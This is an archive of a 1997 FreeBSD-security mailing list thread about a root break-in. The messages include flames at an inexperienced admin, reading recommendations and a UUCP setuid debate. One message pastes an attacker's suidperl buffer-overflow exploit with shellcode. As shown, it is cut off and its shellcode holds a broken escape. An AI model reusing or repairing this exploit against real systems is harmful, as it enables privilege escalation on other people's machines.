>  Vince - vince@MCESTATE.COM - vince@GAIANET.NET            ________   __ ____
>  Unix Networking Operations - FreeBSD-Real Unix for Free  / / / / |  / |[__  ]
>  GaiaNet Corporation - M & C Estate                       / / / / | / | __] ]
>  Beverly Hills, California USA 90210                     / / / / /|/ / | __] ]
>  HongKong Stars/Gravis UltraSound Mailing Lists Admin    /_/_/_/_/|___/|_|[____]
>
>

From owner-freebsd-security Wed Jul 30 09:28:18 1997
To: Nate Williams
cc: Marco Molteni, Vincent Poy, security@freebsd.org, "[Mario1-]"
From: Poul-Henning Kamp
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Wed, 30 Jul 1997 08:49:12 MDT." <199707301449.IAA04613@rocky.mt.sri.com>
Date: Wed, 30 Jul 1997 18:26:07 +0200
Message-ID: <2212.870279967@critter.dk.tfs.com>

>Ahh, but you assume that we haven't ever seen Vinny before.
>Unfortunately, his behavior is 'typical', in that he wants us to do all
>his research and work for him, rather than him spending the time to do
>his own work.  He also shows a complete lack of interest in finding out
>solutions to his own problems.
>
>I've dealt with him too many times over the last 2 years to have
>anything but pity on any company he works for, since he will require
>hand-holding and doesn't do anything on his own.
>
>
>Nate

We have a name for that here in Denmark, we call such people
"Wheel-barrow-people".  You can use them to do the grunt work, but you
have to have a tight grip on them with both your hands.  If you leave
them for however long or short a moment, they'll be the same place you
left them when you come back.

--
Poul-Henning Kamp             | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk   | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                  | phk@tfs.com           TRW Financial Systems, Inc.
Power and ignorance is a disgusting cocktail.

From owner-freebsd-security Wed Jul 30 09:33:56 1997
From: Poul-Henning Kamp
To: Vincent Poy
cc: Nate Williams, Marco Molteni, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Wed, 30 Jul 1997 08:33:52 PDT."
Date: Wed, 30 Jul 1997 18:32:01 +0200
Message-ID: <2277.870280321@critter.dk.tfs.com>

In message , Vincent Poy writes:
>On Wed, 30 Jul 1997, Nate Williams wrote:
>
>=)> 	I know.  I mean Nate and Jordan has been in this thing for at least
>=)> twice as long as I have.  I'm only 23 years old now.
>=)
>=)When I turned 23, I had been minix hacking for 2-3 years.  How old do
>=)you think Chris Demetriou (of NetBSD fame) is?  You've got lots of
>=)excuses, but no answers.
>
>	When you were 23 and when Chris were 23, you guys were in the
>field of hacking and stuff.  I was one who learned my way around computers
>without taking any classes or anything.  It's just these 2 years,
>everything seemed to need more priority than it used to because hackers
>are a greater risk now than they are before among other things.  I am in
>the field of astrophysics and haven't learned Unix from anyone but just
>myself.

I'm not even going to tell you what I did when I was 23, and the fact
that all I had was a high-school exam is merely incidental.

People seem to take the path of least resistance, and for some of us
that is "finding out" and for others like Vince that seems to be "Whine
and somebody will help you".

--
Poul-Henning Kamp             | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk   | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                  | phk@tfs.com           TRW Financial Systems, Inc.
Power and ignorance is a disgusting cocktail.
From owner-freebsd-security Wed Jul 30 09:49:44 1997
Date: Wed, 30 Jul 1997 09:45:04 -0700 (PDT)
From: Satya Palani
To: Shashi Joshi
cc: Marco Molteni, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com
Subject: Re: So, lets have a checklist compiled (was Re: Security hole)
In-Reply-To: <199707301450.JAA25877@shift-f1.com>

On Wed, 30 Jul 1997, Shashi Joshi wrote:

> Exactly my thoughts.  So, do we get a checklist or reference list from the
> gurus?
> My point?  Having a document or a checklist would be real helpful to newbies
> and can serve as a quick reference for the gurus.

All new systems administrators should be forced to read the following
two books: "Practical Unix & Internet Security" and "Essential System
Administration."  Both are published by O'Reilly & Associates
(www.ora.com).  After this, you should be able to make a checklist that
is appropriate for your environment.

-Satya

From owner-freebsd-security Wed Jul 30 10:13:51 1997
Message-ID: <19970730111817.40362@denver.net>
Date: Wed, 30 Jul 1997 11:18:17 -0600
From: John-David Childs
To: security@FreeBSD.ORG
Subject: Re: die thread die!
References: <199707301513.JAA04836@rocky.mt.sri.com>
In-Reply-To: <199707301513.JAA04836@rocky.mt.sri.com>; from Nate Williams on Wed, Jul 30, 1997 at 09:13:42AM -0600
Organization: Enterprise Internet Solutions

Thus wrote Nate Williams on Jul 30:
> > 	I know.  I mean Nate and Jordan has been in this thing for at least
> > twice as long as I have.  I'm only 23 years old now.
>
> When I turned 23, I had been minix hacking for 2-3 years.  How old do
> you think Chris Demetriou (of NetBSD fame) is?  You've got lots of
> excuses, but no answers.
>

We've all agreed that the security hole in FreeBSD thread wasn't really
a hole in FreeBSD as much as limitations imposed by knowledge and
resources and the thread should have died long ago.  However, personal
attacks have even less merit on the security list (or any public list).

--
John-David Childs (JC612)       Enterprise Internet Solutions
System Administrator            @denver.net/Internet-Coach/@ronan.net
& Network Engineer              901 E 17th Ave, Denver 80218
As of this^H^H^H^H next week, passwords will be entered in Morse code.

From owner-freebsd-security Wed Jul 30 10:37:45 1997
Date: Wed, 30 Jul 1997 10:37:36 -0700 (PDT)
From: Ian Kallen To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <2277.870280321@critter.dk.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk This thread needs to go away now. Cease stating the obvious and/or expressing self-pity. If it's not pertinent to FreeBSD security specifically, take it elsewhere. -- Ian Kallen ian@gamespot.com Director of Technology and Web Administration SpotMedia Communications http://www.gamespot.com/ http://www.videogamespot.com/ From owner-freebsd-security Wed Jul 30 10:54:30 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA20041 for security-outgoing; Wed, 30 Jul 1997 10:54:30 -0700 (PDT) Received: from mtvernon1.accessus.net (johnnyu@mtvernon1.accessus.net [204.248.93.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA20036 for ; Wed, 30 Jul 1997 10:54:28 -0700 (PDT) Received: from localhost (johnnyu@localhost) by mtvernon1.accessus.net (8.8.5/8.7.3) with SMTP id MAA21325 for ; Wed, 30 Jul 1997 12:55:41 -0500 Date: Wed, 30 Jul 1997 12:55:40 -0500 (CDT) 
From: NoHackMe! To: security@freebsd.org Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe From owner-freebsd-security Wed Jul 30 11:39:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23382 for security-outgoing; Wed, 30 Jul 1997 11:39:53 -0700 (PDT) Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23376 for ; Wed, 30 Jul 1997 11:39:50 -0700 (PDT) Received: from gvl-07851 (poste221.vl.videotron.net [206.231.222.221]) by bizet.videotron.net (8.8.5/8.8.2) with SMTP id OAA09501 for ; Wed, 30 Jul 1997 14:39:10 -0400 (EDT) Message-Id: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> X-Sender: gilbertp@pop.videotron.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.2 (32) Date: Wed, 30 Jul 1997 14:44:02 -0400 To: security@FreeBSD.ORG 
From: Patrick Gilbert Subject: Re: security hole in FreeBSD In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk At 17:27 97-07-28 -0700, you wrote: > Just a update on how the break-in was done after the hacker was >confronted on irc. > > Apparently FreeBSD ships with .rhosts in the root account. Using >this and perl5.00401, the user was able to rlogin onto the other machine >without using a password. After a brief discussion with TheCa on Efnet, he dcc'd me his famous exploit for a transcript of his brief moment of fame on this discussion list.

/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */
#include
#include
#include
#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void) { asm("movl %esp,%eax"); }

char buf[BUFFER_SIZE];

main(int argc, char *argv[]) {
  int i;
  char execshell[] =
    "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  for(i=0+1;i

Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA25403 for security-outgoing; Wed, 30 Jul 1997 12:05:00 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA25393 for ; Wed, 30 Jul 1997 12:04:54 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id PAA21876; Wed, 30 Jul 1997 15:00:01 -0400 (EDT)
From: Adam Shostack Message-Id: <199707301900.PAA21876@homeport.org> Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> from Shashi Joshi at "Jul 30, 97 09:50:56 am" To: shashi@shift-f1.com (Shashi Joshi) Date: Wed, 30 Jul 1997 15:00:01 -0400 (EDT) Cc: molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Guy Helmer is working on a paper on exactly this topic. Perhaps he could post a pointer to his current draft? Adam | Exactly my thoughts. So, do we get a checklist or reference list from the | gurus? | | I am also a bit new to the sys admin duties. I have | taken the time to read the FreeBSD book that came with the CD (which | doesn't help much in the security area), read a UNIX sysadmin book (Nemeth, | Snyder etc the Red Book) but it too has its limitations. | | We don't have external user logins, so the risks are much less, but I would | always like to learn because soon we will be "out there". | | Another netter mentioned about FreeBSD should ship with some documentation, | scripts that tell us (about the system files and directories) what are the | files associated with "feature" A or "service" B (e.g. uucp), which files | need to be setuid for what functionality. | | Here is an example. (I know you gurus will laugh, but it was my 3rd day only). | | Realizing that sbin dirs are for sysadmin related files, I made the */sbin | as -r-xr-x--- and group being wheel or bin as appropriate. | Now, after a few weeks!! I realised that I am not able to send out any | mail. I had been receiving mail like anything, my elm session also didn't | complain when I sent out email. Finally I checked the logs and found | nothing, not a trace of a mail sent out. 
So I checked to see `which | sendmail` and it was /usr/sbin/sendmail | So I had to give r-x permissions to it to the world. | | Now why would sendmail be in sbin when it is not purely a sysadmin tool | only? | | My point? Having a document or a checklist would be real helpful to newbies | and can serve as a quick reference for the gurus. | | regards, | | -- | Shashi Joshi | -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Wed Jul 30 14:01:05 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03267 for security-outgoing; Wed, 30 Jul 1997 14:01:05 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA03259 for ; Wed, 30 Jul 1997 14:01:02 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id QAA01312; Wed, 30 Jul 1997 16:00:43 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id PAA01063; Wed, 30 Jul 1997 15:52:39 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Wed, 30 Jul 1997 15:52:38 -0500 (CDT) 
From: "Jay D. Nelson" To: James Seng cc: security@FreeBSD.ORG Subject: Keep UUCP (Was: Re: security hole in FreeBSD) In-Reply-To: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Sometimes I think we can be too "internet-centric" for our own good. UUCP makes good security and economic sense. An ISP that caters to internet aficionados will have no use for UUCP. But commercial customers are showing interest because a) UUCP isolates them from the internet, providing greater security while keeping employees from `surfing', b) costs far less than the typical dedicated connection. PSInet charges $50/Mo. + $145.00 setup, I believe, and c) many of our foreign friends have no other reasonable way to go. From the ISP's perspective, a UUCP account ties up far fewer resources than the dedicated or ppp account. As an example, last month I transferred 12.14 Megs with a total connect time of 1.66 hours (28.8). If I had an out-of-state long distance peer, I would have spent less than $14.00 in long distance charges. In other words, my commercial client could have one UUCP connection to a provider and serve mail to seven out-of-state offices for less than the typical dedicated 64K ISDN account. So that is my case. I understand the desire to reduce distribution size and eliminate unused suid binaries -- but to take UUCP out seems to me equivalent to getting rid of the C compiler and development tools. Make it an install option if you want, but leave it as a part of the standard distribution. -- Jay On Wed, 30 Jul 1997, James Seng wrote: ->At 09:06 PM 7/29/97 -0400, Adam Shostack wrote: ->> Let me be clear; I don't have anything against UUCP users, but ->>most people don't need it turned on.
Since parts of it are ->>setuid, (and thus potential security holes) I think it's reasonable ->>to suggest that it ship either not setuid or as an install option. -> ->I have not heard of any request for the use of UUCP from my users nor have my ->UUCP binaries been used in the last few years...I think the time when leased ->lines were expensive, when universities worked with 9,600bps (wow) connections and ->when UUCP ruled the earth is over...we have to let it go and look forward. *8) -> ->I have nothing against UUCP of cos but it is always nice if we can reduce ->the base distribution size by leaving some of the less often used stuff out. -> ->*cheers* -> ->-James Seng -> From owner-freebsd-security Wed Jul 30 14:04:28 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03459 for security-outgoing; Wed, 30 Jul 1997 14:04:28 -0700 (PDT) Received: from usr01.primenet.com (root@usr01.primenet.com [206.165.6.201]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA03449 for ; Wed, 30 Jul 1997 14:04:22 -0700 (PDT) Received: from frontera (mario1@ip62-219.vcv.primenet.com [207.218.62.219]) by usr01.primenet.com (8.8.5/8.8.5) with SMTP id OAA15012; Wed, 30 Jul 1997 14:03:01 -0700 (MST) Date: Wed, 30 Jul 1997 14:07:13 -0700 (Pacific Daylight Time)
From: "[Mario1-]" To: Vincent Poy cc: Nate Williams , Marco Molteni , security@freebsd.org Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: X-X-Sender: Mario1@imap.primenet.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Vincent Poy wrote: : I'll try but with this security incident, it's different because : all three of us went into panic since if we had access to the machine now, : we would be able to at least find things. I guess what I need to do is : find the time to start reading things but I don't know where to start : since things in the computer area become obsolete so fast these days : anyways. : Vince, to get quick answers, fire up your web browser and do a search. You'd be surprised at the amount of information out there, and no upfront cost for books is involved. Regards, -- Mario1@PrimeNet.Com http://www.primenet.com/~mario1 Eskimo Democracy: "If you continue to subscribe to this list only to publicly oppose any decision nanook or I make, I'm going to disallow you post permission to this list." dwild@eskimo.com From owner-freebsd-security Wed Jul 30 14:24:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA04523 for security-outgoing; Wed, 30 Jul 1997 14:24:48 -0700 (PDT) Received: from cs.iastate.edu (cs.iastate.edu [129.186.3.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA04416 for ; Wed, 30 Jul 1997 14:23:31 -0700 (PDT) Received: from popeye.cs.iastate.edu (popeye.cs.iastate.edu [129.186.3.4]) by cs.iastate.edu (8.8.5/8.7.1) with ESMTP id QAA10709; Wed, 30 Jul 1997 16:22:54 -0500 (CDT) Received: from localhost (ghelmer@localhost) by popeye.cs.iastate.edu (8.8.5/8.7.1) with SMTP id QAA22586; Wed, 30 Jul 1997 16:22:54 -0500 (CDT) X-Authentication-Warning: popeye.cs.iastate.edu: ghelmer owned process doing -bs Date: Wed, 30 Jul 1997 16:22:53 -0500 (CDT)
From: Guy Helmer To: Adam Shostack cc: Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301900.PAA21876@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Adam Shostack wrote: > Guy Helmer is working on a paper on exactly this topic. Perhaps he > could post a pointer to his current draft? > Adam > > | Exactly my thoughts. So, do we get a checklist or reference list from the > | gurus? A slightly older draft of the paper is at http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps but it should serve well enough for now for those in need of at least pointers to the broad spectrum of FreeBSD security improvements. A current version of the paper isn't ready for posting... Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu Iowa State University http://www.cs.iastate.edu/~ghelmer From owner-freebsd-security Wed Jul 30 15:26:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08744 for security-outgoing; Wed, 30 Jul 1997 15:26:06 -0700 (PDT) Received: from Kryten.nina.org (port-32.ts2.gnv.fdt.net [205.229.51.160]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08732 for ; Wed, 30 Jul 1997 15:26:01 -0700 (PDT) Received: from localhost (frankd@localhost) by Kryten.nina.org (8.8.5/8.8.5) with SMTP id SAA23464; Wed, 30 Jul 1997 18:11:39 -0400 (EDT) X-Authentication-Warning: Kryten.nina.org: frankd owned process doing -bs Date: Wed, 30 Jul 1997 18:11:39 -0400 (EDT) 
From: Frank Seltzer X-Sender: frankd@Kryten.nina.org To: Guy Helmer cc: Adam Shostack , Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Guy Helmer wrote: > A slightly older draft of the paper is at > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > but it should serve well enough for now for those in need of at least > pointers to the broad spectrum of FreeBSD security improvements. A > current version of the paper isn't ready for posting... > > Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu > Iowa State University http://www.cs.iastate.edu/~ghelmer > > I get a 404 when trying to 'fetch' this. Frank -- Only in America can a homeless veteran sleep in a cardboard box while a draft dodger sleeps in the White House - anonymous From owner-freebsd-security Wed Jul 30 15:51:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA10136 for security-outgoing; Wed, 30 Jul 1997 15:51:11 -0700 (PDT) Received: from kalypso.iqm.unicamp.br (kalypso.iqm.unicamp.br [143.106.51.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA10129 for ; Wed, 30 Jul 1997 15:51:06 -0700 (PDT) Received: (from vazquez@localhost) by kalypso.iqm.unicamp.br (8.8.6/8.7.3/FreeBSD/2.1.5) id TAA17929; Wed, 30 Jul 1997 19:54:27 -0300 (EST) 
From: Pedro A M Vazquez Message-Id: <199707302254.TAA17929@kalypso.iqm.unicamp.br> Subject: Re: So, lets have a checklist compiled (was Re: Security hole) To: frankd@yoda.fdt.net (Frank Seltzer) Date: Wed, 30 Jul 1997 19:54:27 -0300 (EST) Cc: security@freebsd.org In-Reply-To: from "Frank Seltzer" at Jul 30, 97 06:11:39 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Me too, just add a .gz : http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps.gz Frank Seltzer was saying that: > > > A slightly older draft of the paper is at > > > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > I get a 404 when trying to 'fetch' this. > Pedro From owner-freebsd-security Wed Jul 30 15:53:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA10388 for security-outgoing; Wed, 30 Jul 1997 15:53:53 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA10379 for ; Wed, 30 Jul 1997 15:53:50 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id PAA14882; Wed, 30 Jul 1997 15:53:24 -0700 (PDT) To: Marco Molteni cc: Vincent Poy , security@FreeBSD.ORG, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 14:04:33 +0200." Date: Wed, 30 Jul 1997 15:53:24 -0700 Message-ID: <14878.870303204@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Do you think one can be a newcomer as an administrator, but _has_ to know > everything about security before he starts to work? Come on! Actually, if this question is: "Can a newcomer to UNIX be an administrator" then the answer is a most emphatic "NO." I don't let the mechanically inept work on my car, either, and I wouldn't expect a 1st-year UNIX hacker to sell himself as an admin (or if [s]he did, I certainly bloody wouldn't hire them and would probably further denounce as a fool anyone who did). This flame doesn't also actually have a lot to do with Vince directly, though I do think that he's perhaps a little too inexperienced for the job he's taken on, but is rather more of a commentary on a highly disturbing phenomenon which I've observed in far too many ISPs lately. It seems like becoming an ISP has been the "in" thing to do these last few years, and many have jumped in with far more enthusiasm than skill. I probably get between 2 and 3 calls a week from some ISP who's completely hosed themselves and, as it turns out, knows NOTHING about UNIX or any of the infrastructure issues behind building an ISP and yet they're trying to do it anyway. What's the deal here? Did somebody drop a million matchbooks over the U.S. saying "become an ISP and make tons of $$$ in your spare time! No knowledge whatsoever is required! Yes, even the legally dead can enter the profitable world of ..." 
:-) Jordan From owner-freebsd-security Wed Jul 30 16:04:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11011 for security-outgoing; Wed, 30 Jul 1997 16:04:55 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11004 for ; Wed, 30 Jul 1997 16:04:52 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA14961; Wed, 30 Jul 1997 16:04:24 -0700 (PDT) To: Vincent Poy cc: Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 06:45:49 PDT." Date: Wed, 30 Jul 1997 16:04:24 -0700 Message-ID: <14957.870303864@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never > know everything and will need to learn from others. Unless everyone is > Albert Einstein here. It's not what you know, it's how you learn. Be more willing to investigate the obvious before you run to the mailing lists for help and you'll go much further here, Vince. Lack of proper "investigative skills" is your biggest weakness, as I've amply seen while observing you these last couple of years, and you won't hone this skill by asking questions, you'll hone it by spending just a little extra time on each problem before bringing up that email client. Jordan From owner-freebsd-security Wed Jul 30 16:07:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11123 for security-outgoing; Wed, 30 Jul 1997 16:07:58 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11116 for ; Wed, 30 Jul 1997 16:07:55 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA14985; Wed, 30 Jul 1997 16:07:02 -0700 (PDT) To: Shashi Joshi cc: molter@logic.it (Marco Molteni), vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-reply-to: Your message of "Wed, 30 Jul 1997 09:50:56 CDT." <199707301450.JAA25877@shift-f1.com> Date: Wed, 30 Jul 1997 16:07:02 -0700 Message-ID: <14982.870304022@time.cdrom.com>
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Exactly my thoughts. So, do we get a checklist or reference list from the > gurus? I seriously doubt it. None of the gurus have this kind of time. > My point? Having a document or a checklist would be real helpful to newbies > and can serve as a quick reference for the gurus. The body of available UNIX documentation out there, much of which is listed in the glossary of the FreeBSD handbook, is about as good as it gets and it isn't all that bad - even as complete a "checklist" as I could imagine would end up being largely replicating the docs which these books currently provide. Jordan From owner-freebsd-security Wed Jul 30 16:26:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12269 for security-outgoing; Wed, 30 Jul 1997 16:26:32 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12247 for ; Wed, 30 Jul 1997 16:26:26 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA15075; Wed, 30 Jul 1997 16:24:58 -0700 (PDT) To: Vincent Poy cc: Nate Williams , Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 08:28:47 PDT." Date: Wed, 30 Jul 1997 16:24:58 -0700 Message-ID: <15071.870305098@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > The docs that came with the product. As for books, I don't have > that much time to go through reading books because by the time I finish > reading it, it'll be too late. Heh. Vinnie, that is the most completely and utterly bogus argument I've ever heard. I have the Stevens book on Networking right here, for example, and it's as relevant today as it was the day it was published (and a great book on network programming besides). The same goes for the 4.4 BSD book from McKusick et al. If you want to know about the kernel, it's a fine place to start. Or how about Evi Nemeth's book on system admin? Even the old editions are still largely relevant, and I'd recommend the book to anyone. This sounds like a pathetic excuse for avoiding your necessary reading and nothing else but. Give it up - now you're just trying to cram the other foot in where the first is already taking up all the space. :-) > You're still forgetting the fact that when you are physically > there next to the router machine, it's a night and day difference in > figuring things out. But when it's like totally remote, then you do need > to verify things first instead of totally screwing it up. Besides, for You first run simulations on your own machine, Vince. If you haven't got a machine for doing this kind of thing then I suggest that you de-volunteer for this position you've taken on because you are NOT QUALIFIED to admin a system under these constraints. Believe it or not, admin'ing for an ISP is not a kiddy game. Anyway, I think you simply need to listen more, argue less and be willing to do more basic research before reaching for the red phone in the future if you want to be a success at this and not have everybody hating the very sight of your email address to boot.
When my martial arts teacher tells me that I'm not standing straight enough or that I'm too tense and am blowing some form I'm doing, I don't sass back and claim that Sifu doesn't know what he's talking about - of course he knows all that waaaaay better than I do and that's why I'm going to his bloody class. Similarly, people like Nate and I know this stuff a hell of a lot better than you do and when we say "Vince, you're fucking up - go read this book" then you should go read it, you shouldn't fire off another diatribe in response about how you don't have time or that the space aliens from the planet Zoobula who live in your sock drawer will be displeased. If you really do see yourself as such a beginner then LISTEN to those who know and stop being so bleeding contentious about everything. When we tell you to do something it's for a reason and we expect you to either do it or simply stop asking questions since you've obviously reached expert status on your own and no longer need our advice. Jordan From owner-freebsd-security Wed Jul 30 16:26:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12277 for security-outgoing; Wed, 30 Jul 1997 16:26:35 -0700 (PDT) Received: from yoss.canweb.net (root@yoss.canweb.net [207.139.235.8]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12252 for ; Wed, 30 Jul 1997 16:26:27 -0700 (PDT) Received: from localhost (yossman@localhost) by yoss.canweb.net (8.8.5/8.8.5) with SMTP id TAA01717; Wed, 30 Jul 1997 19:20:40 -0400 (EDT) Date: Wed, 30 Jul 1997 19:20:40 -0400 (EDT) 
